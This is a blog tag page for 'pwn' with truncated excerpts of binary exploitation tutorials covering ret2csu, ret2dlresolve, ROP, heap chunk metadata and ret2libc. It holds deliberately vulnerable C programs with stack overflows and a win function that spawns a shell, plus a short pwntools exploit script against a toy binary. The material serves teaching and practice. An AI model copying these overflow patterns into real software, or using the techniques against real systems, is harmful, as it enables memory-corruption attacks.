Articles tagged pwn

ret2csu

Vulnerable program:

    #include <stdio.h>

    int win(int x, int y, int z) {
        if(z == 0xdeadbeefcafed00d) {
            puts("Awesome work!");
        }
    }

    int main() {
        puts("Come on then, ret2csu me");
        char input[30];
        gets(input);
        return 0;
    }

Exploitation analysis

Conventional exploitation: the overflow takes control of rip and points it at a gadget; the gadget is responsible for calling win. Exploit code:

    from pwn import *

    elf = context.binary = ELF('./vuln')
    p = process()

    log.info(f'win addr is : {hex(elf.sym.win)}')

    offset = 40
    rop = ROP(elf)
    rop.raw(offset * 'a')
    rop.win(0,0,0xdeadbeefcafed00d)

    p.recv()
    p.sendline(rop.chain())
    result = p.recvline()
    log.info(result)

The code above rests on the assumption that a gadget can be built, but in practice……


ret2dlresolve

Summary: with ret2dlresolve, an attacker can induce the binary to resolve a function of their choosing (for example system) into the PLT. A dynamically linked ELF object imports libc functions on the first call through the PLT and GOT. When a runtime symbol is relocated, RIP jumps into the PLT and attempts to resolve that symbol. During this process, a "……


socket exploitation

socket vuln

    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    void vuln(int childfd) {
        char buffer[30];
        read(childfd, buffer, 500);
        write(childfd, "Thanks!", 8);
    }

    void win() {
        system("/bin/sh");
    }

    ////////////////////// Socket Stuff

    /*
     * error - wrapper for perror
     */
    void error(char *msg) {
        perror(msg);
        exit(1);
    }

    int main(int argc, char **argv) {
        int parentfd;                   /* parent socket */
        int childfd;                    /* child socket */
        int portno;                     /* port to listen on */
        int clientlen;                  /* byte size of client's address */
        struct sockaddr_in serveraddr;  /* server's addr */
        struct sockaddr_in clientaddr;  /* client addr */
        struct hostent *hostp;          /* client host info */
        char *hostaddrp;                /* dotted decimal host addr string */
        int optval;                     /* flag value for setsockopt */
        int n;                          /* message byte size */

        /*
         * check……


ROP

ROP

Return-oriented programming defeats the W⊕X protections recently deployed by Microsoft, Intel, and AMD; in this context, it can be seen as a generalization of traditional return-into-libc attacks. But the threat is more general.

gadget

What a gadget is: each gadget is an arrangement of words on the stack, both pointers to instruction sequences and immediate data words, that when invoked accomplishes some well-defined task.

"W⊕X" ensures that no memory location in a process image is marked both writable ("W") and executable ("X").

Gadget features: one gadget might perform a load operation, another an xor, and another a conditional branch.

Example program:

    from pwn import *

    context.arch = 'amd64'
    context.os = 'linux'

    elf = ELF.from_assembly(
    '''
        mov rdi, 0;
        mov rsi, rsp;
        sub rsi, 8;
        mov rdx,……


heap: chunks and bins

chunks

On x86_64 a chunk carries 16 extra bytes of metadata; on x86 it carries 8 extra bytes.

metadata := prev size + size + flags(A,M,P)

prev size: if the adjacent preceding chunk has been freed, this holds the size of that previous chunk.
size: the size of this chunk.
P(0x01): Previous in Use; indicates whether the preceding chunk is allocated and in use. When P == 0, the chun…… preceding this chunk


ret2libc

ret2libc

When a program is built with NX protection, traditional shellcode placed on the stack cannot execute and so cannot be used to obtain a shell; the ret2libc technique can be used instead.

Vulnerable program:

    #include <stdio.h>

    void vuln() {
        char buffer[64];
        puts("Overflow me");
        gets(buffer);
    }

    int main() {
        vuln();
    }

Compiled with:

    gcc vuln.c -m32 -fno-stack-protector -no-pie -o vuln-32

    └─$ checksec --file=./vuln-32
    [*] '/home/kali/exploits/ret2libc/vuln-32'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)

Exploitation plan: point eip directly at system('/bin/……
